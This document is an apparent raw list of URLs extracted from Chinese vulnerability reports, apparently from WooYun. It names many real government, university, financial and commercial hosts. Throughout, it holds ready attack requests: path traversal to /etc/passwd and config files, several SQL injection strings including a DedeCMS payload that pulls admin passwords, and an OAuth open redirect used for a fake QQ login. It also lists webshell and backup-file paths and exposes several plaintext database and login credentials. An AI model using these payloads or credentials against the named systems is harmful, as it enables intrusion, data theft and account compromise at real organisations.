http://27.214.186.29:88/doc/page/main.asp http://27.214.211.252:88/doc/page/main.asp http://27.208.218.196:88/doc/page/main.asp http://27.213.92.69:88/doc/page/main.asp http://27.223.25.178:88/doc/page/main.asp http://27.219.103.108:82/doc/page/main.asp http://27.215.83.184:82/doc/page/main.asp 
http://27.216.236.41:81/doc/page/main.asp http://27.210.70.93:81/doc/page/main.asp http://**.**.**.**/logout.jsp https://202.97.177.14 http://211.151.21.215:8085/callback http://wxadmin.chukong-inc.com/login/OAuthcallback.html http://211.151.21.31:8087/callback http://211.151.21.215:8086/callback http://211.151.21.155/callback http://211.151.21.31:8083/callback http://211.151.21.31:8082/callback http://beijing.jingsai.ciwong.com/anquan/ajax/getTotalJoinCount POST:configId=111&organizationID=11000000&areaCode=11000000 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/user/getUser?username=admin http://zwgk.ahedu.gov.cn/XxgkWeb/index.aspx http://**.**.**.**/bugs/wooyun-2010-0104907 http://**.**.**.**/toOrderDetail.htm?userInfoId=1 http://zhuanti.ahedu.gov.cn/jylzfx/more.asp?nClass_Id=1 http://www.gzzoc.com/# http://oa.gzzoc.com http://**.**.**.**/ http://xinfuchuangtou.com/ http://www.nuochencaifu.com/ http://guangzecaifu.com/ http://zhuangyuandai.com/ http://junyuancaifu.com/ http://yongxinct.com/ http://minxinchuangtou.com/ http://haotaiwangdai.com/ http://lwgfjr.com/ http://wx.daling.com:8004/admin http://182.92.187.191/zabbix/dashboard.php http://daichong.qiyun.com/ http://**.**.**.**/manager/login.aspx http://**.**.**.** http://**.**.**.**/editor/editor/filemanager/upload/php/upload.php http://**.**.**.**/upload/File/l.php jdbc:mysql**.**.**.**:3316/oa8000?user=root&password=htoa8000 https://saas.ufida.com.cn http://sysusp.sysu.edu.cn/zsusp/jsp/main/news.jsp?cid=C6B266B628F000013970153018901F83 http://gzycdtb.dayoo.com/index.php?a=doit&c=index&eid=1&m=exam http://**.**.**.**/www.rar,备份时间不详,但数据库管理员口令在备份的配置文件中 http://www.smartapp4u.com/kfz.html IP:140.207.213.17 http://zhidao.baidu.com/link?url=Goo_B_luIu5ZWAjM9j2trO9z89ylEv_WxRs_Xinz7-wxTVWgkpvevLHdDkCqbNnchk_md9mAP1orCFdKJbXopqeCxaHFQx1lWc7hyxIeTOi http://auto.data.longhoo.net/index.php?city=1&bid=172&r=SellerPriceBrand%2FIndex&pid=24 http://open.baidu.com/data/ms/xml/xmlcheck?nav=1 
http://zjc.sicnu.edu.cn:80/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx http://**.**.**.**/deptment!showDepartMents.action http://**.**.**.**/wy.jsp http://user.ddmap.com/dcmember/userinfo http://www.dfcv.com.cn/Service.aspx http://22ya.com/aback/login.aspx http://monitor.tianjimedia.com:81/ http://www.ellechina.com/ellechina.tar.gz http://www.hupo.com:80/ www.hupo.com http://px.cdrcb.com/index.jsp http://csjp.lazypea.com/Account/LogOn http://222.73.158.83/phpmyadmin http://huodong.ymatou.com/minisite/jkvote/index.php https://github.com/lixingming/my-crm/blob/20126c42c1bb192a561c0b2e5170139090acdec7/src/main/java/com/b5m/util/mail/SendMailDemo.java application:8000 http://sysusp.sysu.edu.cn:80/zsusp/login.jsp?action=login&password=null&userid=1 http://www.ztemt.com/cn/ http://www.ztemt.com/cn/online.aspx?on=4 http://www.ztemt.com/uploadfiles/main/images/2015/8/20150803183025.aspx http://gps.371gps.com/gps/login http://**.**.**.**/portal/jsp/index.jsp http://**.**.**/jsp/common/download.jspfilepath=/./../.././../../../../../etc/passwd http://**.**.**/jsp/common/download.jsp http://**.**.**/portal/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**//jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**//jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jsp http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://**.**.**/jsp/common/download.jspfilepath=/./.././.././.././.././.././.././.././../etc/passwd http://60.10.8.227:89/login.do http://log.7fgame.com/ http://library.sysu.edu.cn/webpage-admin/VerifyImage.action https://github.com/k518/ddd/blob/270d789b4f7fde0025adea88abcccbdb3cd5103b/monitor/test.py 
http://gdjy.hfut.edu.cn/picNewsInfo.jsp?id=1 http://**.**.**.**/hardware/hardware.rar http://**.**.**.**/Template/Default/Default.zip http://**.**.**.**/ http://**.**.**.**/down.rar Google:inurl:/opac/index.jsp http://**.**.**.**/images/smiley/60.php http://life.sysu.edu.cn/netcooperation/guestbook.php3 http://kms.ys7.com:8081/logPage/?logType=../../../../../../../../../../usr/local/nginx/logs/error.log&executorId=2&appId=app-20140829153405-0000 http://kms.ys7.com:8081/logPage/?logType=../../../../../../../../../../etc/passwd&executorId=2&appId=app-20140829153405-0000 http://**.**.**.**/ http://**.**.**.**/baf/jsp/uiframe/login.xhtml http://**.**.**.**/globeyes/adminjspa/index.jsp http://**.**.**.**/faq.php?id=1 http://**.**.**.**/faq.php?id=1 bdbrowser://snapshot/后面是网址 bdbrowser://snapshot/ http://www.zxssyxx.com/kindeditor/attached/image/20140929/html.html http://10.90.233.19/ http://10.90.233.20/ http://10.90.233.21/ http://10.90.233.22/ http://10.90.233.23/ http://10.90.233.24/ http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.25/ http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.26/ http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.27/ http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.28/ http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.29/ http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.30/ http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.31/ http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.32/ http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.33/ http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException 
http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.36/ http://10.90.233.37/ http://10.90.233.38/ http://10.90.233.39/ http://10.90.233.40/ http://10.90.233.41/ http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.43/ http://10.90.233.44/ http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.46/ http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.47/ http://10.90.233.48/ http://10.90.233.49/ http://10.90.233.50/ http://10.90.233.51/ http://10.90.233.52/ http://10.90.233.53/ http://10.90.233.54/ http://10.90.233.55/ http://10.90.233.56/ http://10.90.233.57/ http://10.90.233.58/ http://10.90.233.59/ http://10.90.233.60/ http://10.90.233.61/ http://10.90.233.62/ http://10.90.233.63/ http://10.90.233.64/ http://10.90.233.65/ http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.66/ http://10.90.233.67/ http://10.90.233.68/ http://10.90.233.69/ http://10.90.233.70/ http://10.90.233.71/ http://10.90.233.72/ http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.73/ http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException http://10.90.233.74/ http://10.90.233.75/ http://zhuangyuandai.com/r_pwd_1.jsp http://yunwei.tianjimedia.cn/files/%E7%AE%A1%E7%90%86%E6%96%87%E6%A1%A3/ http://www.whmzj.gov.cn:8080/system/manager/terminalLogin.do http://**.**.**.**/admin/login.asp http://www.flnet.com/Pages/MemberCenter/ForgotPwd.aspx https://221.8.74.29/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 https://pxcz.gov.cn/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 https://218.94.121.236/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814 
https://60.191.100.179/cgi-pub/exportdata.cgi?type=1&begintime=20130813&endtime=20150814 https://60.191.100.179/cgi-pub/exportdata.cgi?type=2&begintime=20130813&endtime=20150814 https://60.191.100.179/cgi-pub/exportdata.cgi?type=10&begintime=20120813&endtime=20150814 http://www.7caihua.com/Userreg/userorderinfo.htm?newOID=1%27%20or%20%271%27=%271 http://www.7caihua.com/Orders/userorderinfo_cx?OrderID=1%27%20or%20%271%27=%271&CustomerPhone=1%27%20or%20%271%27=%271 http://www.7caihua.com/Orders/userorderpay/OrderID/1222333'%20or%20'1'='1 uems.sysu.edu.cn/jwxt/ http://www.hnhrmy.com:8006/login.aspx http://bdm.ys7.com:89/verifyLogin.do http://**.**.**.**/)下的业务系统 https://github.com/573338063/txglMavenArtifact/blob/722fe7fd94d11a4ebf668061ed68c3220519d72a/txglMavenArtifact/src/main/java/txgl/email/email.properties http://**.**.**.**/WZYW/index.aspx http://hc.brandwisdom.cn/config.php.bak http://m.jbdc.com.cn/ http://price.ziroom.com/?_p=../../../../../../../../etc/passwd%00.html http://**.**.**.**/about.php?id=18注入点 http://**.**.**.**/ http://**.**.**.**/ http://iug.sysu.edu.cn/actices.asp?id=1321 http://**.**.**.**/ModelPages/MarketActivity/MANews.aspx?ColumnCode=%27+OR+%27ns%27%3d%27ns http://www.dangao.com http://**.**.**.**/yuanjian/login.aspx http://xg.hbwj.com.cn http://xg.hbwj.com.cn/Page/ http://xg.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/MasRecGrid.aspx http://xg.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://www.dangao.com/Userreg/mycang_del?id=84047 http://www.chemao.com.cn:80/ http://radio.3g.cnfol.com/ http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.elitone.cn&www.qq.com www.qq.com就会被拦截 http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.elitone.cn http://nWQxM.elitone.cn 
http://dourp.sysu.edu.cn/about.aspx?classcode=002001 http://saps.sysu.edu.cn/content.asp?c=68&m=1000&n=3181&todo=showinfo http://sociology.sysu.edu.cn/search.php http://**.**.**.**/aspx/main/myShop.aspx?cityCode=1 http://**.**.**.**:80/ http://www.crsdyy.com/ptsj/login.asp http://**.**.**.**/Question.aspx?qNo=425&act=q http://gm.mm.gtarcade.com/ http://www.hupo.com www.hupo.com http://202.116.102.10/summer/index.php?do=info&id=27 http://www.agent.nissay-greatwall.cn/NISSAY/%28S%285ticp155wr3xoj55is3txdz5%29%29/AgentSalarySearch/ASS0102.aspx?AgentID=ZJ0003788&PerfYM=201504 https://**.**.**.**/cq20110310/adsb/blob/db479f8b3f62cd0dca1f118dbf2790e903719731/Aircraft/config/ReceiveCompressADSBConfig.php http://183.224.74.252/Login.aspx http://**.**.**.**/ http://**.**.**.**/ http://lvzhou.h3c.com/o2o/o2omng/login.xhtml http://www.caitongam.com/yuangong.php http://www.caitongam.com/login.php https://github.com/gaoxw126/ucdev https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/umonitor2/script/deploy/redis-rotate/utils/sender.py https://github.com/gaoxw126/ucdev/search?utf8=%E2%9C%93&q=mysqldb&type=Code https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/chkaccount/check_mul_delete_org/check/get_account_all_step0.sh https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/umonitor2/script/deploy/umonitor2_crontab/cmdb/server_type_inside.sh https://github.com/gaoxw126/ucdev/blob/e36e29e40af21f34408d05306e29768874c025a3/add_monitor_item/excute_ssh_shell.py http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 
http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 
http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 http://**.**.**.**/webCompAction.do?action=topSearch&PARENTTYPEID=100001 www.csairholiday.com/?m=mywap&c=activities&a=my_activities&flag=1 http://financehuawei.hiall.com.cn/openday/admin/ http://**.**.**.**/search.aspx?chid=13&fieldname=title&keyword=%5Bobject%20HTMLInputElement%5D http://**.**.**.**/search.aspx?chid=13&fieldname=title&keyword=%5Bobject%20HTMLInputElement%5D http://**.**.**.** http://cert.chemao.com.cn/.svn/entries www.sttacas.org http://**.**.**.**/subpage.asp?parentclassname= http://**.**.**.**/Z_show.asp?ArticleID=1925%20&parentclassname=3 http://**.**.**.**/database/ http://www.nissay-greatwall.com.cn/product/product.php?aid=126 http://campus.coolpad.com//index.php?c=schoolRecruitment&cate=internetBusy*&f=jobPosition http://www.glball.com/index.php/product/search?DeadLine=3&IssuerName=%22* http://rap.qian360.com/org/index.do http://shop.taikang.com/tkecs/service/memberinfo/init?&member_id=13888612&flow_id=1001 http://mall.cmbc.com.cn/ http://**.**.**.**/ProductView.Asp?id=6 
http://**.**.**.**/e/searchcompany/?id=975046 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/fang-an/dian-xing-ke-hu http://**.**.**.**/case.html http://**.**.**.**/c6/Jhsoft.Web.login/PassWordNew.aspx http://**.**.**.**/c6/JHSoft.MobileApp/Login/login.html http://**.**.**.**/ http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 www.xiaozufan.com http://221.237.153.40:86/ http://221.237.153.40:86/general/vmeet/wbUpload.php?fileName=test.php+ www.dictbee.com http://**.**.**.**/Website/xjlist.jsp http://www.zs6y.com/aboutus.aspx?code=0201 http://www.zs6y.com/Department.aspx?code=030211 http://www.zs6y.com/DoctorDetail.aspx?id=222&code=1101 http://www.h-h.com.cn/Flight/Tuigai.aspx?air=KN5818&cw=E&stype=0 http://www.h-h.com.cn/Flight/Flight_show.aspx http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.fawziya.cn&www.qq.com http://paypassport.suning.com/ids/oauth20/authorize中的redirect_uri跳转漏洞,跳转到仿造QQ空间的网站,同时对账号密码进行验证与记录(成功登录会跳转至本人QQ空间,错误提示重试。) http://nWQxM.fawziya.cn http://**.**.**.**/jxjy/query.do?method=downloadFile&type=xls&path=web-inf\web.xml&ajax=AJAX http://**.**.**.**/jxjy/query.do?method=downloadFile&type=xls&path=login.jsp&ajax=AJAX http://dmoa.cofco.com/seeyon/index.jsp http://mail.cofcorice.com/ http://www.cofcorice.com/,在人才招聘处可以注册,这里我注册了一个111@qq.com http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/message.jsp?fmodulecode=5700&modulecode=5701&messageid=10211 http://yangtai.xunlei.com/ http://yangtai.xunlei.com/?author= http://yangtai.xunlei.com/xmlrpc.php http://**.**.**.** http://**.**.**.**/flight/Tuigai.aspx?air=321&cw=&stype=1 http://**.**.**.**/flight/Flight_show.aspx 
http://love.dangdang.com/ad/ http://love.dangdang.com/public/file/ http://xg.hbwj.com.cn http://hg.hbjzj.com.cn http://yc.hbwj.com.cn/ http://yc.hbwj.com.cn/Page/ http://yc.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://yc.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://yc.hbwj.com.cn/Page/N2013_CostPage/MasRecGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://xn.hbwj.com.cn/ http://xn.hbwj.com.cn/Page/ http://xn.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://sz.hbwj.com.cn/ http://sz.hbwj.com.cn/page/ http://www.zhenrenyi.com/admin/index http://211.162.66.163:9999/login.action http://ad.v1.cn/ https://**.**.**.**/zhumengle/lexindaweixinframe/blob/cc07ab1001fc0dbc1f1e8e3b18ef315a746a7270/lexindaframe/src/main/resource/mail.properties http://**.**.**.**/PublicInfoList.aspx http://**.**.**.**/PublicInfoList.aspx?key=1&type=1&department=&begindate=&enddate= http://**.**.**.**/InformationView.aspx?InfoCode=0e4c819f-9bc9-4c9e-b834-0b88dbc825c1 http://**.**.**.**/NewsBolckSecondList.aspx?class=d0f31435-11a7-4f41-bf35-11260336cb99&parentclass=c4c7a08a-5dbd-4791-88ee-d82af4ce4f8a http://t.ufida.com.cn/Service.asmx?WSDL http://tong.ufida.com.cn/Service.asmx?WSDL http://tempuri.org/PRM_Support http://tong.ufida.com.cn/Service.asmx?WSDL http://mylib.duxiu.com/a/showMsg.action?msgid=115236 http://**.**.**.**/zt2014/2014graduate/news.php?id=4896 http://www.smgjj.com/BusinessConsulting.aspx http://www.smgjj.com/BusinessConsulting.aspx http://lib.utibet.edu.cn/news.jsp?nid=news20150715_1024 http://lib.utibet.edu.cn/notice_duzhe.jsp?tid=tz20131115_2257 http://lib.utibet.edu.cn/notice_guanyuan.jsp?tid=tz20131115_2343 http://lib.utibet.edu.cn/picnews.jsp?nid=news20150715_1024 http://tyclub.telefen.com/newjf_hgo2/html/HGOIndex_em.html 
GET:http://tyclub.telefen.com/newlife/interface/setMsCode?DeviceNo=+手机号码+&SmsCode=13 GET:http://tyclub.telefen.com/newlife/interface/msCodeLogin?Mobile=+手机号+&MsCode=+验 http://www.glszcits.com/showArticle.asp?id=556 http://www.glszcits.com/showArticle.asp http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/index.php/Product/detail/id/145 http://**.**.**.**:80/index.php/Product/detail/id/145 http://url/log/system.log http://url/log/vpn.log http://url/log/mobile.log http://url/log/firewall.log http://url/log/access.log http://url/log/warn.log http://url/log/error.log http://url/log1/debug.log http://地址/cgi-bin/index?oid=10&session_id=通过“system.log”文件获取&l=0 http://www.shsb.cn:8081/medias/2.aspx http://www.shsb.cn:8081/medias/3.aspx http://www.shsb.cn:8081/medias/4.aspx http://www.shsb.cn:8081/medias/5.aspx http://www.shsb.cn:8081/medias/6.aspx https://vicp.ecpic.com.cn/sxcb/phone/customer/getUserInfo.do https://vicp.ecpic.com.cn http://m.duomi.com/down/model_list.php?brand_id=14&fi http://crbccms.com:8888/ http://**.**.**.**/article.php?aid=42 http://**.**.**.**/jwr/userlogin/loginAction.action,如图所示: http://envi.ruc.edu.cn/competition/dede/index.php http://envi.ruc.edu.cn/competition/rili/wp-admin/ http://115.47.56.82:80/ http://115.47.56.82:80/ http://shop.neusoft.edu.cn/ChocolateServlet?id=* http://shop.neusoft.edu.cn/Findfoodservlet?food_name=*&order_list_title=%25E7%259B%2596%25E9%25A5%25AD%25E7%25B1%25BB&_=1439687116971 http://shop.neusoft.edu.cn/InterestFoodDetailServlet?food_id=cho2013111813324027 http://shop.neusoft.edu.cn/LatticeServlet http://**.**.**.**/mobiletemplate/Login.aspx index.php/news/search?keywords=999999 https://qian.tenpay.com/mqq/action/financing150727/hb_open.shtml?stat_data=fm_137_gdtlcj_36&prize=******* http://ss.pkusz.edu.cn/ http://www.neuedu.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ 
http://**.**.**.**/ http://**.**.**.**:22080/hcdzsb/rbac/logon.do http://**.**.**.**:8088/hcdzsb/rbac/logon.do filetype:doc http://club.sgsbaye.com/uc_server http://117.121.137.4/ http://117.121.137.4/?proc=9&req=801&resource=secure http://mail.szpku.edu.cn/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/manage/admin_login.asp http://**.**.**.**/index.php?s=/Department/staff/id/5 http://cigna.sysu.edu.cn:80/main/news/NewsList.aspx?pId=12&no=1 http://www.wochacha.com/ http://www.wochacha.com/interface_getbasecity.html http://www.moootooo.com/ http://112.124.33.6/mpsf/loginAction.action dir:/root/apache-tomcat-6.0.35/webapps/mpsf/ http://112.124.33.6/mpsf/images/wooyun.jsp http://passport.hzins.com/retrieve http://**.**.**.**/ http://**.**.**.**/)可是鼎鼎有名的卖房中介,跑去东看看西看看~ http://**.**.**.**/QAList.aspx?search= http://**.**.**.**/ http://**.**.**.**/g23_echo_magazine.php?rootid=1&year=2015 http://**.**.**.**/g23_echo_magazine.php?rootid=1&year=2015 http://www.wstmall.com/ http://bbs.z.ztgame.com/uc_server http://bbs.z.ztgame.com/uc_server/helpss.php http://mis.998.com/GreenTreeInn/Login.aspx http://oa.998.com/login/Login.jsp http://oa.998.com/login/Login.jsp http://101.227.68.206/home/login http://mis.998.com:5655/Home/Logon http://bill.998.com/login http://101.227.68.206/ inurl:lres/study/lecture.html http://**.**.**.**/,用的是siteserver http://**.**.**.**:806/vmain/login.jsp http://**.**.**.**:806/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid= http://**.**.**.**:806//picstore/fbb204a4061ffbd41284a84c258c1bfb.jsp无密码 http://icp.now.cn/data/admin.php http://icp.now.cn/admin/login.php http://tongji.myfund.com/phpmyadmin/ http://drops.wooyun.org/papers/7830 http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18 http://res.ly.sgws.g.1360.com/static/52xiyou/js/logic1.2.js u.muzhiwan.com/api/inc/.svn/entries u.muzhiwan.com/api/.svn/entries 
u.muzhiwan.com/class/.svn/entries u.muzhiwan.com/common/.svn/entries http://www.erongdu.com/KejIeRongdU2014/ http://www.erongdu.com/robots.txt http://new.pianke.me/ http://www.plgjj.com/search.asp http://42.159.27.54/view_initIndexPageForCustomer.action http://42.159.27.54/view_initIndexPageForCustomer.action http://youxi.miercn.com/log.txt http://**.**.**.**/list.php?c=7 http://ll.fj10010.com/fa/faLoginAction!loginOut.action?accountType=0 http://202.118.83.94:85/public/ShowTutorInfo.aspx?ID=20041025&spec=13 http://scan.cninsure.net pMQgbrmCELKt:14jbakc78 http://drops.wooyun.org/tips/349 http://drops.wooyun.org/tips/349,解出来了数据库的密码 http://news.zjicm.edu.cn/www.rar http://ejk.czinfo.net/login.php http://ejk.czinfo.net/announce_view.php?id=5 http://ejk.czinfo.net/ep_user_edit.php?orgid=&page=1&id=1063 http://ejk.czinfo.net/channel_edit.php?devid=SWIT-VIDSEC-0x0001507-8FE77012&id=135&page=1&oid= http://ejk.czinfo.net/mobi/3g/login.php http://baike.meadin.com/control/login/ inurl:kuwo.cn/cafe/jsp/ http://mail.utibet.edu.cn/ http://oa.21cn.com:9090/login.do?message=110&verify= com:9090 http://oa.21cn.com:9090 http://www.haikongjinrong.com/tmp http://219.216.227.241:9980/ http://**.**.**.**/ http://**.**.**.** http://zc.xmgps.com http://zc.xmgps.com/Webgps/WebPost_Test.aspx http://zc.xmgps.com/Login.aspx http://my.360dns.com/Login/forget_password.html http://analytics.yonghongtech.com:8080/bi/Viewer http://analytics.yonghongtech.com:8080/bi/Viewer?proc=2&resource=../../../../../../../etc/passwd http://www.minsco-fj.com/cn/indexnews.asp?id=57 inurl:/hrss,wooyun搜/hrss/的案例比较多 http://career.sdebank.com/hrss/dorado/smartweb2.RPC.d?__rpc=true file:///etc/passwd http://tx.cnfol.com http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 http://lian.admin5.com/phpmyadmin/ www.cfjsol.com:9988/Home/Index http://im.9158.com http://bbs.renrenche.com/ http://bbs.renrenche.com/config/config_global.php.bak 
http://bbs.renrenche.com/config/config_ucenter.php.bak http://bbs.renrenche.com/uc_server/admin.php http://roche.hiall.com.cn/k8.php http://**.**.**.**/bugs/wooyun-2015-0134350 http://union.ceair.com/ http://**.**.**.**/website.rar http://job.ceair.com/Index.aspx http://job.ceair.com/FindPwdCardByQuestion.aspx?card=bGYuDkIy%2BDQ= http://job.ceair.com/FindPwdCheckByQuestion.aspx?a=XXXX http://job.ceair.com/FindPwdCheckByQuestion.aspx?a=k4vV9SH8mx0ZRgbMtwV6ttO/USH9YVJY http://**.**.**.**/names.nsf?Login&Username=luoyi&Password=196373&RedirectTo=/Produce/WeboaConfig.nsf/HomeForm?OpenForm http://ets-ccaa.open.com.cn/Login.aspx https://www.sunfobank.com/logining.html?paramMap.password=admin¶mMap.code=135791&coverPassword=admin¶mMap.pageId=userlogin¶mMap.email=admin@admin.com9988 http://xcd.xeeyu.net/UserLogin.aspx http://xcd.xeeyu.net http://**.**.**.**/)主站的SQL漏洞,随意注入点: http://**.**.**.**/agentdetail.asp?id=l7233 http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call= http://**.**.**.**/login.jsp http://**.**.**.**/index.shtml),注入点: http://**.**.**.**/allfangx/sunco.action.NewsListAction.do?optiontype=getNewsList&type=-2 http://t.yahui.cc/index.php?mod=yahuizhongguo http://t.yahui.cc/index.php?mod=yahuizhongguo%df http://city.zol.com/bid_api/web/getDealers?bid=402880552acc07e2012acc09f7da08b8 http://shell.cnfol.com/hk_stock/holder.php?num=20 http://shell.cnfol.com/hk_stock/rating.php?num=20 http://wooyun.org/bugs/wooyun-2010-0125053漏洞提到的号码:15683401303为例说明 http://220.250.65.185/ http://220.250.65.185 https://218.26.97.178/ http://momdc.sysu.edu.cn/searchonc1.asp?Brows_Bio=[sql]搜索get过来的参数基本存在注入(不一一列举了) http://momdc.sysu.edu.cn/searchonc2.asp?bio_SR=[sql http://momdc.sysu.edu.cn/comp_Detail.asp?onc_ID=[sql http://**.**.**.**/bugs/wooyun-2010-065966 http://**.**.**.**/ 